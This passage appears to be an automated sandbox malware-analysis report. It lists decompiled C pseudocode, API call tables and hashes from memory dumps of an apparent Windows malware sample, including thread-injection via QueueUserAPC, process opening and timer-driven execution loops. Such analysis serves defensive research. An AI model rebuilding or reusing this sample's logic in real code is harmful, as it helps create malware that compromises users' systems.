                                                                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(04C09570), ref: 00DF18B5
                                                                                                                                                                                                • Part of subcall function 00DF4D2C: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,00DF52FE,?,04C095B0), ref: 00DF4D57
                                                                                                                                                                                                • Part of subcall function 00DF4D2C: lstrlen.KERNEL32(?,?,?,00DF52FE,?,04C095B0), ref: 00DF4D5F
                                                                                                                                                                                                • Part of subcall function 00DF4D2C: strcpy.NTDLL ref: 00DF4D76
                                                                                                                                                                                                • Part of subcall function 00DF4D2C: lstrcat.KERNEL32(00000000,?), ref: 00DF4D81
                                                                                                                                                                                                • Part of subcall function 00DF4D2C: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00DF52FE,?,04C095B0), ref: 00DF4D9E
                                                                                                                                                                                              • StrTrimA.SHLWAPI(00000000,00DFC294,?,04C095B0), ref: 00DF18EC
                                                                                                                                                                                                • Part of subcall function 00DF9DEF: lstrlen.KERNEL32(?,00000000,00000000,00DF5335,616D692F,00000000), ref: 00DF9DFB
                                                                                                                                                                                                • Part of subcall function 00DF9DEF: lstrlen.KERNEL32(?), ref: 00DF9E03
                                                                                                                                                                                                • Part of subcall function 00DF9DEF: lstrcpy.KERNEL32(00000000,?), ref: 00DF9E1A
                                                                                                                                                                                                • Part of subcall function 00DF9DEF: lstrcat.KERNEL32(00000000,?), ref: 00DF9E25
                                                                                                                                                                                              • lstrcpy.KERNEL32(00000000,?), ref: 00DF1919
                                                                                                                                                                                              • lstrcpy.KERNEL32(?,?), ref: 00DF1921
                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 00DF192F
                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 00DF1935
                                                                                                                                                                                                • Part of subcall function 00DFA5E9: lstrlen.KERNEL32(?,00000000,00DFD330,00000001,00DF937A,00DFD00C,00DFD00C,00000000,00000005,00000000,00000000,?,?,?,00DF207E,?), ref: 00DFA5F2
                                                                                                                                                                                                • Part of subcall function 00DFA5E9: mbstowcs.NTDLL ref: 00DFA619
                                                                                                                                                                                                • Part of subcall function 00DFA5E9: memset.NTDLL ref: 00DFA62B
                                                                                                                                                                                              • wcstombs.NTDLL ref: 00DF19C8
                                                                                                                                                                                                • Part of subcall function 00DFA060: SysAllocString.OLEAUT32(?), ref: 00DFA09B
                                                                                                                                                                                                • Part of subcall function 00DFA060: IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 00DFA11E
                                                                                                                                                                                                • Part of subcall function 00DF147E: HeapFree.KERNEL32(00000000,00000000,00DF1D11,00000000,?,?,-00000008), ref: 00DF148A
                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?), ref: 00DF1A09
                                                                                                                                                                                              • RtlFreeHeap.NTDLL(00000000,00000000,616D692F,00000000), ref: 00DF1A15
                                                                                                                                                                                              • RtlFreeHeap.NTDLL(00000000,?,?,04C095B0), ref: 00DF1A21
                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 00DF1A2D
                                                                                                                                                                                              • RtlFreeHeap.NTDLL(00000000,?), ref: 00DF1A39
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.613522818.0000000000DF1000.00000020.00000001.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.613479500.0000000000DF0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613600445.0000000000DFC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613625403.0000000000DFD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613644005.0000000000DFF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 603507560-0
                                                                                                                                                                                              • Opcode ID: 0672c71b392b365fa505b938d2c87ab5a26487044ba5cf24caf6eb3a6bfad099
                                                                                                                                                                                              • Instruction ID: 2af7e5542878fea801205636f6cf90d08664e319d53a7d4f35add4a8eacec311
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0672c71b392b365fa505b938d2c87ab5a26487044ba5cf24caf6eb3a6bfad099
                                                                                                                                                                                              • Instruction Fuzzy Hash: D3913875900208EFCB11DFA4DD89ABA7BBAEF48310F168454FA08DB261DB31D951DBB0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 85%
                                                                                                                                                                                              			E00A811D4(void* __ecx, void* __edx, void* __edi, long _a4) {
                                                                                                                                                                                              				long _v8;
                                                                                                                                                                                              				void* _v32;
                                                                                                                                                                                              				long _t21;
                                                                                                                                                                                              				long _t23;
                                                                                                                                                                                              				long _t25;
                                                                                                                                                                                              				void* _t26;
                                                                                                                                                                                              				long _t29;
                                                                                                                                                                                              				long _t30;
                                                                                                                                                                                              				long _t34;
                                                                                                                                                                                              				void* _t39;
                                                                                                                                                                                              				intOrPtr _t42;
                                                                                                                                                                                              				void* _t47;
                                                                                                                                                                                              				void* _t52;
                                                                                                                                                                                              				signed int _t55;
                                                                                                                                                                                              				void* _t57;
                                                                                                                                                                                              				intOrPtr* _t58;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t47 = __ecx;
                                                                                                                                                                                              				_t21 = E00A8179C();
                                                                                                                                                                                              				_v8 = _t21;
                                                                                                                                                                                              				if(_t21 != 0) {
                                                                                                                                                                                              					return _t21;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				do {
                                                                                                                                                                                              					_t55 = SwitchToThread() + 8;
                                                                                                                                                                                              					_t23 = E00A81B6F(__edi, _t55); // executed
                                                                                                                                                                                              					_v8 = _t23;
                                                                                                                                                                                              					Sleep(0x20 + _t55 * 4); // executed
                                                                                                                                                                                              					_t25 = _v8;
                                                                                                                                                                                              				} while (_t25 == 0xc);
                                                                                                                                                                                              				if(_t25 != 0) {
                                                                                                                                                                                              					L21:
                                                                                                                                                                                              					return _t25;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_push(__edi);
                                                                                                                                                                                              				if(_a4 != 0) {
                                                                                                                                                                                              					L11:
                                                                                                                                                                                              					_t26 = CreateThread(0, 0, __imp__SleepEx,  *0xa84140, 0, 0); // executed
                                                                                                                                                                                              					_t57 = _t26;
                                                                                                                                                                                              					if(_t57 == 0) {
                                                                                                                                                                                              						L18:
                                                                                                                                                                                              						_v8 = GetLastError();
                                                                                                                                                                                              						L19:
                                                                                                                                                                                              						_t25 = _v8;
                                                                                                                                                                                              						if(_t25 == 0xffffffff) {
                                                                                                                                                                                              							_t25 = GetLastError();
                                                                                                                                                                                              						}
                                                                                                                                                                                              						goto L21;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t29 = QueueUserAPC(E00A816E4, _t57,  &_v32); // executed
                                                                                                                                                                                              					if(_t29 == 0) {
                                                                                                                                                                                              						_t34 = GetLastError();
                                                                                                                                                                                              						_a4 = _t34;
                                                                                                                                                                                              						TerminateThread(_t57, _t34);
                                                                                                                                                                                              						CloseHandle(_t57);
                                                                                                                                                                                              						_t57 = 0;
                                                                                                                                                                                              						SetLastError(_a4);
                                                                                                                                                                                              					}
                                                                                                                                                                                              					if(_t57 == 0) {
                                                                                                                                                                                              						goto L18;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						_t30 = WaitForSingleObject(_t57, 0xffffffff);
                                                                                                                                                                                              						_v8 = _t30;
                                                                                                                                                                                              						if(_t30 == 0) {
                                                                                                                                                                                              							GetExitCodeThread(_t57,  &_v8);
                                                                                                                                                                                              						}
                                                                                                                                                                                              						CloseHandle(_t57);
                                                                                                                                                                                              						goto L19;
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				if(E00A8130B(_t47,  &_a4) != 0) {
                                                                                                                                                                                              					 *0xa84138 = 0;
                                                                                                                                                                                              					goto L11;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t58 = __imp__GetLongPathNameW;
                                                                                                                                                                                              				_t39 =  *_t58(_a4, 0, 0); // executed
                                                                                                                                                                                              				_t52 = _t39;
                                                                                                                                                                                              				if(_t52 == 0) {
                                                                                                                                                                                              					L9:
                                                                                                                                                                                              					 *0xa84138 = _a4;
                                                                                                                                                                                              					goto L11;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t10 = _t52 + 2; // 0x2
                                                                                                                                                                                              				_t42 = E00A81026(_t52 + _t10);
                                                                                                                                                                                              				 *0xa84138 = _t42;
                                                                                                                                                                                              				if(_t42 == 0) {
                                                                                                                                                                                              					goto L9;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				 *_t58(_a4, _t42, _t52); // executed
                                                                                                                                                                                              				E00A81938(_a4);
                                                                                                                                                                                              				goto L11;
                                                                                                                                                                                              			}



















                                                                                                                                                                                              0x00a811d4
                                                                                                                                                                                              0x00a811db
                                                                                                                                                                                              0x00a811e2
                                                                                                                                                                                              0x00a811e7
                                                                                                                                                                                              0x00a81308
                                                                                                                                                                                              0x00a81308
                                                                                                                                                                                              0x00a811ee
                                                                                                                                                                                              0x00a811f6
                                                                                                                                                                                              0x00a811fa
                                                                                                                                                                                              0x00a811ff
                                                                                                                                                                                              0x00a8120a
                                                                                                                                                                                              0x00a81210
                                                                                                                                                                                              0x00a81213
                                                                                                                                                                                              0x00a8121a
                                                                                                                                                                                              0x00a81305
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a81305
                                                                                                                                                                                              0x00a81220
                                                                                                                                                                                              0x00a81224
                                                                                                                                                                                              0x00a8127a
                                                                                                                                                                                              0x00a8128a
                                                                                                                                                                                              0x00a81290
                                                                                                                                                                                              0x00a8129a
                                                                                                                                                                                              0x00a812f5
                                                                                                                                                                                              0x00a812f7
                                                                                                                                                                                              0x00a812fa
                                                                                                                                                                                              0x00a812fa
                                                                                                                                                                                              0x00a81301
                                                                                                                                                                                              0x00a81303
                                                                                                                                                                                              0x00a81303
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a81301
                                                                                                                                                                                              0x00a812a6
                                                                                                                                                                                              0x00a812b4
                                                                                                                                                                                              0x00a812b6
                                                                                                                                                                                              0x00a812ba
                                                                                                                                                                                              0x00a812bd
                                                                                                                                                                                              0x00a812c4
                                                                                                                                                                                              0x00a812c9
                                                                                                                                                                                              0x00a812cb
                                                                                                                                                                                              0x00a812cb
                                                                                                                                                                                              0x00a812d3
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a812d5
                                                                                                                                                                                              0x00a812d8
                                                                                                                                                                                              0x00a812de
                                                                                                                                                                                              0x00a812e3
                                                                                                                                                                                              0x00a812ea
                                                                                                                                                                                              0x00a812ea
                                                                                                                                                                                              0x00a812f1
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a812f1
                                                                                                                                                                                              0x00a812d3
                                                                                                                                                                                              0x00a81231
                                                                                                                                                                                              0x00a81274
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a81274
                                                                                                                                                                                              0x00a81233
                                                                                                                                                                                              0x00a8123e
                                                                                                                                                                                              0x00a81240
                                                                                                                                                                                              0x00a81244
                                                                                                                                                                                              0x00a8126a
                                                                                                                                                                                              0x00a8126d
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a8126d
                                                                                                                                                                                              0x00a81246
                                                                                                                                                                                              0x00a8124b
                                                                                                                                                                                              0x00a81250
                                                                                                                                                                                              0x00a81257
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00a8125e
                                                                                                                                                                                              0x00a81263
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00A8179C: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00A811E0), ref: 00A817AB
                                                                                                                                                                                                • Part of subcall function 00A8179C: GetVersion.KERNEL32(?,00A811E0), ref: 00A817BA
                                                                                                                                                                                                • Part of subcall function 00A8179C: GetCurrentProcessId.KERNEL32(?,00A811E0), ref: 00A817D6
                                                                                                                                                                                                • Part of subcall function 00A8179C: OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00A811E0), ref: 00A817EF
                                                                                                                                                                                              • SwitchToThread.KERNEL32 ref: 00A811EE
                                                                                                                                                                                                • Part of subcall function 00A81B6F: VirtualAlloc.KERNELBASE(00000000,-00000008,00003000,00000004,00000000,?,-00000008,-00000008), ref: 00A81BC5
                                                                                                                                                                                                • Part of subcall function 00A81B6F: memcpy.NTDLL(?,?,-00000008,?,?,?,?,?,?,?,?,00A811FF,-00000008), ref: 00A81C57
                                                                                                                                                                                                • Part of subcall function 00A81B6F: VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00A81C72
                                                                                                                                                                                              • Sleep.KERNELBASE(00000000,-00000008), ref: 00A8120A
                                                                                                                                                                                              • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 00A8123E
                                                                                                                                                                                              • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 00A8125E
                                                                                                                                                                                              • CreateThread.KERNEL32 ref: 00A8128A
                                                                                                                                                                                              • QueueUserAPC.KERNELBASE(00A816E4,00000000,?), ref: 00A812A6
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00A812B6
                                                                                                                                                                                              • TerminateThread.KERNEL32(00000000,00000000), ref: 00A812BD
                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00A812C4
                                                                                                                                                                                              • SetLastError.KERNEL32(?), ref: 00A812CB
                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00A812D8
                                                                                                                                                                                              • GetExitCodeThread.KERNEL32(00000000,?), ref: 00A812EA
                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00A812F1
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00A812F5
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00A81303
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.612932571.0000000000A80000.00000040.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.612964625.0000000000A85000.00000040.00020000.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.612984516.0000000000A87000.00000040.00020000.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLastThread$CloseCreateHandleLongNamePathProcessVirtual$AllocCodeCurrentEventExitFreeObjectOpenQueueSingleSleepSwitchTerminateUserVersionWaitmemcpy
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3896949738-0
                                                                                                                                                                                              • Opcode ID: 32dd9265074935c04bf3fbc31ec6466a78343436207ea8654bb461b005bd54ab
                                                                                                                                                                                              • Instruction ID: 994cdb6da34f2fedec8dde92e6742a454a1668c97310ea08cacb1776938cbd7a
                                                                                                                                                                                              • Opcode Fuzzy Hash: 32dd9265074935c04bf3fbc31ec6466a78343436207ea8654bb461b005bd54ab
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9A3139B2800219BBCF11FFE4DC889AE7BBCEA087A4B104565F905D6120E7348E439BA0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 83%
                                                                                                                                                                                              			E00DF9B6F(void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                              				void _v48;
                                                                                                                                                                                              				long _v52;
                                                                                                                                                                                              				struct %anon52 _v60;
                                                                                                                                                                                              				char _v72;
                                                                                                                                                                                              				long _v76;
                                                                                                                                                                                              				void* _v80;
                                                                                                                                                                                              				union _LARGE_INTEGER _v84;
                                                                                                                                                                                              				struct %anon52 _v92;
                                                                                                                                                                                              				void* _v96;
                                                                                                                                                                                              				void* _v100;
                                                                                                                                                                                              				union _LARGE_INTEGER _v104;
                                                                                                                                                                                              				long _v108;
                                                                                                                                                                                              				intOrPtr _v120;
                                                                                                                                                                                              				struct %anon52 _v128;
                                                                                                                                                                                              				struct %anon52 _t46;
                                                                                                                                                                                              				void* _t51;
                                                                                                                                                                                              				long _t53;
                                                                                                                                                                                              				void* _t54;
                                                                                                                                                                                              				struct %anon52 _t60;
                                                                                                                                                                                              				long _t64;
                                                                                                                                                                                              				struct %anon52 _t65;
                                                                                                                                                                                              				void* _t68;
                                                                                                                                                                                              				void* _t72;
                                                                                                                                                                                              				signed int _t73;
                                                                                                                                                                                              				void* _t75;
                                                                                                                                                                                              				void* _t78;
                                                                                                                                                                                              				void** _t82;
                                                                                                                                                                                              				signed int _t86;
                                                                                                                                                                                              				void* _t89;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t75 = __edx;
                                                                                                                                                                                              				_v52 = 0;
                                                                                                                                                                                              				memset( &_v48, 0, 0x2c);
                                                                                                                                                                                              				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
                                                                                                                                                                                              				_t46 = CreateWaitableTimerA(0, 1, 0);
                                                                                                                                                                                              				_v60 = _t46;
                                                                                                                                                                                              				if(_t46 == 0) {
                                                                                                                                                                                              					_v92.HighPart = GetLastError();
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_push(0xffffffff);
                                                                                                                                                                                              					_push(0xff676980);
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push( *0xdfd240);
                                                                                                                                                                                              					_v76 = 0;
                                                                                                                                                                                              					_v80 = 0;
                                                                                                                                                                                              					L00DFB088();
                                                                                                                                                                                              					_v84.LowPart = _t46;
                                                                                                                                                                                              					_v80 = _t75;
                                                                                                                                                                                              					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
                                                                                                                                                                                              					_t51 =  *0xdfd26c; // 0x3c4
                                                                                                                                                                                              					_v76 = _t51;
                                                                                                                                                                                              					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
                                                                                                                                                                                              					_v108 = _t53;
                                                                                                                                                                                              					if(_t53 == 0) {
                                                                                                                                                                                              						if(_a8 != 0) {
                                                                                                                                                                                              							L4:
                                                                                                                                                                                              							 *0xdfd24c = 5;
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							_t68 = E00DF68CF(); // executed
                                                                                                                                                                                              							if(_t68 != 0) {
                                                                                                                                                                                              								goto L4;
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_v104.LowPart = 0;
                                                                                                                                                                                              						L6:
                                                                                                                                                                                              						L6:
                                                                                                                                                                                              						if(_v104.LowPart == 1 && ( *0xdfd260 & 0x00000001) == 0) {
                                                                                                                                                                                              							_v104.LowPart = 2;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t73 = _v104.LowPart;
                                                                                                                                                                                              						_t58 = _t73 << 4;
                                                                                                                                                                                              						_t78 = _t89 + (_t73 << 4) + 0x3c;
                                                                                                                                                                                              						_t74 = _t73 + 1;
                                                                                                                                                                                              						_v92.LowPart = _t73 + 1;
                                                                                                                                                                                              						_t60 = E00DF9F11(_t74, _t78, _t74, _t89 + _t58 + 0x3c, _t78,  &_v96,  &_v100); // executed
                                                                                                                                                                                              						_v128.LowPart = _t60;
                                                                                                                                                                                              						if(_t60 != 0) {
                                                                                                                                                                                              							goto L17;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t65 = _v92;
                                                                                                                                                                                              						_v104.LowPart = _t65;
                                                                                                                                                                                              						_t97 = _t65 - 3;
                                                                                                                                                                                              						if(_t65 != 3) {
                                                                                                                                                                                              							goto L6;
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							_v120 = E00DF54AC(_t74, _t97,  &_v72, _a4, _a8);
                                                                                                                                                                                              						}
                                                                                                                                                                                              						goto L12;
                                                                                                                                                                                              						L17:
                                                                                                                                                                                              						__eflags = _t60 - 0x10d2;
                                                                                                                                                                                              						if(_t60 != 0x10d2) {
                                                                                                                                                                                              							_push(0xffffffff);
                                                                                                                                                                                              							_push(0xff676980);
                                                                                                                                                                                              							_push(0);
                                                                                                                                                                                              							_push( *0xdfd244);
                                                                                                                                                                                              							goto L21;
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							__eflags =  *0xdfd248; // 0x0
                                                                                                                                                                                              							if(__eflags == 0) {
                                                                                                                                                                                              								goto L12;
                                                                                                                                                                                              							} else {
                                                                                                                                                                                              								_t60 = E00DF6106();
                                                                                                                                                                                              								_push(0xffffffff);
                                                                                                                                                                                              								_push(0xdc3cba00);
                                                                                                                                                                                              								_push(0);
                                                                                                                                                                                              								_push( *0xdfd248);
                                                                                                                                                                                              								L21:
                                                                                                                                                                                              								L00DFB088();
                                                                                                                                                                                              								_v104.LowPart = _t60;
                                                                                                                                                                                              								_v100 = _t78;
                                                                                                                                                                                              								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
                                                                                                                                                                                              								_t64 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
                                                                                                                                                                                              								_v128 = _t64;
                                                                                                                                                                                              								__eflags = _t64;
                                                                                                                                                                                              								if(_t64 == 0) {
                                                                                                                                                                                              									goto L6;
                                                                                                                                                                                              								} else {
                                                                                                                                                                                              									goto L12;
                                                                                                                                                                                              								}
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              						L25:
                                                                                                                                                                                              					}
                                                                                                                                                                                              					L12:
                                                                                                                                                                                              					_t82 =  &_v72;
                                                                                                                                                                                              					_t72 = 3;
                                                                                                                                                                                              					do {
                                                                                                                                                                                              						_t54 =  *_t82;
                                                                                                                                                                                              						if(_t54 != 0) {
                                                                                                                                                                                              							HeapFree( *0xdfd238, 0, _t54);
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t82 =  &(_t82[4]);
                                                                                                                                                                                              						_t72 = _t72 - 1;
                                                                                                                                                                                              					} while (_t72 != 0);
                                                                                                                                                                                              					CloseHandle(_v80);
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return _v92.HighPart;
                                                                                                                                                                                              				goto L25;
                                                                                                                                                                                              			}
































                                                                                                                                                                                              0x00df9b6f
                                                                                                                                                                                              0x00df9b85
                                                                                                                                                                                              0x00df9b89
                                                                                                                                                                                              0x00df9b8e
                                                                                                                                                                                              0x00df9b95
                                                                                                                                                                                              0x00df9b9b
                                                                                                                                                                                              0x00df9ba1
                                                                                                                                                                                              0x00df9d29
                                                                                                                                                                                              0x00df9ba7
                                                                                                                                                                                              0x00df9ba7
                                                                                                                                                                                              0x00df9ba9
                                                                                                                                                                                              0x00df9bae
                                                                                                                                                                                              0x00df9baf
                                                                                                                                                                                              0x00df9bb5
                                                                                                                                                                                              0x00df9bb9
                                                                                                                                                                                              0x00df9bbd
                                                                                                                                                                                              0x00df9bcb
                                                                                                                                                                                              0x00df9bd9
                                                                                                                                                                                              0x00df9bdd
                                                                                                                                                                                              0x00df9bdf
                                                                                                                                                                                              0x00df9bec
                                                                                                                                                                                              0x00df9bf8
                                                                                                                                                                                              0x00df9bfa
                                                                                                                                                                                              0x00df9c00
                                                                                                                                                                                              0x00df9c09
                                                                                                                                                                                              0x00df9c14
                                                                                                                                                                                              0x00df9c14
                                                                                                                                                                                              0x00df9c0b
                                                                                                                                                                                              0x00df9c0b
                                                                                                                                                                                              0x00df9c12
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df9c12
                                                                                                                                                                                              0x00df9c1e
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df9c22
                                                                                                                                                                                              0x00df9c27
                                                                                                                                                                                              0x00df9c32
                                                                                                                                                                                              0x00df9c32
                                                                                                                                                                                              0x00df9c3a
                                                                                                                                                                                              0x00df9c45
                                                                                                                                                                                              0x00df9c4d
                                                                                                                                                                                              0x00df9c56
                                                                                                                                                                                              0x00df9c59
                                                                                                                                                                                              0x00df9c5d
                                                                                                                                                                                              0x00df9c62
                                                                                                                                                                                              0x00df9c68
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df9c6a
                                                                                                                                                                                              0x00df9c6e
                                                                                                                                                                                              0x00df9c72
                                                                                                                                                                                              0x00df9c75
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df9c77
                                                                                                                                                                                              0x00df9c87
                                                                                                                                                                                              0x00df9c87
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df9cb8
                                                                                                                                                                                              0x00df9cb8
                                                                                                                                                                                              0x00df9cbd
                                                                                                                                                                                              0x00df9cdc
                                                                                                                                                                                              0x00df9cde
                                                                                                                                                                                              0x00df9ce3
                                                                                                                                                                                              0x00df9ce4
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df9cbf
                                                                                                                                                                                              0x00df9cbf
                                                                                                                                                                                              0x00df9cc5
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df9cc7
                                                                                                                                                                                              0x00df9cc7
                                                                                                                                                                                              0x00df9ccc
                                                                                                                                                                                              0x00df9cce
                                                                                                                                                                                              0x00df9cd3
                                                                                                                                                                                              0x00df9cd4
                                                                                                                                                                                              0x00df9cea
                                                                                                                                                                                              0x00df9cea
                                                                                                                                                                                              0x00df9cf2
                                                                                                                                                                                              0x00df9d00
                                                                                                                                                                                              0x00df9d04
                                                                                                                                                                                              0x00df9d10
                                                                                                                                                                                              0x00df9d12
                                                                                                                                                                                              0x00df9d16
                                                                                                                                                                                              0x00df9d18
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df9d1e
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df9d1e
                                                                                                                                                                                              0x00df9d18
                                                                                                                                                                                              0x00df9cc5
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00df9cbd
                                                                                                                                                                                              0x00df9c8b
                                                                                                                                                                                              0x00df9c8d
                                                                                                                                                                                              0x00df9c91
                                                                                                                                                                                              0x00df9c92
                                                                                                                                                                                              0x00df9c92
                                                                                                                                                                                              0x00df9c96
                                                                                                                                                                                              0x00df9ca0
                                                                                                                                                                                              0x00df9ca0
                                                                                                                                                                                              0x00df9ca6
                                                                                                                                                                                              0x00df9ca9
                                                                                                                                                                                              0x00df9ca9
                                                                                                                                                                                              0x00df9cb0
                                                                                                                                                                                              0x00df9cb0
                                                                                                                                                                                              0x00df9d37
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • memset.NTDLL ref: 00DF9B89
                                                                                                                                                                                              • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 00DF9B95
                                                                                                                                                                                              • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 00DF9BBD
                                                                                                                                                                                              • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 00DF9BDD
                                                                                                                                                                                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,00DF4AC4,?), ref: 00DF9BF8
                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,00DF4AC4,?,00000000), ref: 00DF9CA0
                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00DF4AC4,?,00000000,?,?), ref: 00DF9CB0
                                                                                                                                                                                              • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 00DF9CEA
                                                                                                                                                                                              • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?,?), ref: 00DF9D04
                                                                                                                                                                                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00DF9D10
                                                                                                                                                                                                • Part of subcall function 00DF68CF: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04C09388,00000000,?,74B5F710,00000000,74B5F730), ref: 00DF691E
                                                                                                                                                                                                • Part of subcall function 00DF68CF: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04C093C0,?,00000000,30314549,00000014,004F0053,04C0937C), ref: 00DF69BB
                                                                                                                                                                                                • Part of subcall function 00DF68CF: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00DF9C10), ref: 00DF69CD
                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00DF4AC4,?,00000000,?,?), ref: 00DF9D23
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.613522818.0000000000DF1000.00000020.00000001.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.613479500.0000000000DF0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613600445.0000000000DFC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613625403.0000000000DFD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613644005.0000000000DFF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3521023985-0
